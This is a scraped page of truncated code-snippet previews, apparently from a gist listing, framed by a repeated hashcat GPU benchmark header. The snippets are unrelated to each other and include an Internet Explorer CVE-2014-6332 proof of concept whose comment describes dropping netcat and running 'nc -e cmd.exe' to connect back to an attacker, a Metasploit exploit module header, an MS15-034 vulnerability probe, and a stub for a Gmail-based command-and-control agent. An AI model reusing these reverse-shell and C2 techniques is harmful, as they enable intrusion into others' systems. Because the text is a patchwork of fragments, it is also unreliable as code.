Product: Sagitta Brutalis 980 (PN S2480-GTX-980)
Software: cudaHashcat 1.36b25, ForceWare 346.35
Accelerator: 8x Nvidia GTX 980 reference design, +250 clock offset
local coroutine = require "coroutine" | |
local io = require "io" | |
local math = require "math" | |
local nmap = require "nmap" | |
local shortport = require "shortport" | |
local sslcert = require "sslcert" | |
local stdnse = require "stdnse" | |
local string = require "string" | |
local table = require "table" | |
local tls = require "tls" |
<html> | |
<head> | |
<!-- | |
CVE-2014-6332 PoC to bypass IE protected mode if enabled (with localhost) then get shell | |
The PoC drops nc.exe then execute "nc -e cmd.exe -n ip port" | |
'server_ip' and 'server_port' in javascript below determined the connect back target | |
Tested on | |
- IE11 + Windows 7 64-bit (EPM is off) | |
- IE11 + Windoes 8.1 64-bit (EPM is off) |
class GeometryNumber { | |
[double]$Number | |
GeometryNumber() {} | |
GeometryNumber($Number) { $this.Number=$Number } | |
[GeometryNumber] Sqrt() { return [GeometryNumber]::new([Math]::Sqrt($this.Number)) } | |
[GeometryNumber] Reciprocal() { return [GeometryNumber]::new(1/$this.Number) } | |
[GeometryNumber] TangetAngle() { return [GeometryNumber]::new([System.Math]::Atan($this.Number)) } | |
[GeometryNumber] AsDegrees() { return [GeometryNumber]::new($this.Number*180/[Math]::PI) } |
function azrdp { | |
<# | |
.Author | |
Trevor Sullivan <pcgeek86@gmail.com> | |
.Description | |
Invoke a RDP session to an Azure Virtual Machine, without having to type the | |
Cloud Service name or Virtual Machine name. | |
.Outputs |
function Dictionary | |
{ | |
param([Type[]]$Type, [Hashtable]$Hashtable) | |
$KeyType = $Type[0] | |
$ValueType = $Type[1] | |
$Dictionary = New-Object -TypeName "System.Collections.Generic.Dictionary[$KeyType,$ValueType]" | |
$Hashtable.GetEnumerator() | % { |
## | |
# This module requires Metasploit: http://metasploit.com/download | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
require 'msf/core' | |
class Metasploit4 < Msf::Exploit::Remote |
#define _GNU_SOURCE | |
#include <stdio.h> | |
#include <unistd.h> | |
#include <stdlib.h> | |
#include <fcntl.h> | |
#include <signal.h> | |
#include <elf.h> | |
#include <err.h> | |
#include <syslog.h> | |
#include <sched.h> |
function Test-MS15034($url) { | |
try { | |
$wr = [Net.WebRequest]::Create($url) | |
$wr.AddRange('bytes',234234,28768768) | |
$res = $wr.GetResponse() | |
$status = $res.statuscode | |
Write-Output "$status means it is not vulnerable" | |
$res.Close() | |
}catch { | |
if ($Error[0].Exception.InnerException.Response.StatusCode -eq '416') {Write-Output "Site is vulnerable"} |
Below code tries to pull commands from Gmail. | |
#function Invoke-PsGcatAgentIMAP | |
#{ | |
[CmdletBinding()] Param( | |
[Parameter(Position = 0, Mandatory = $false)] | |
[String] | |
$Username, |
Product: Sagitta Brutalis 980 (PN S2480-GTX-980)
Software: cudaHashcat 1.36b25, ForceWare 346.35
Accelerator: 8x Nvidia GTX 980 reference design, +250 clock offset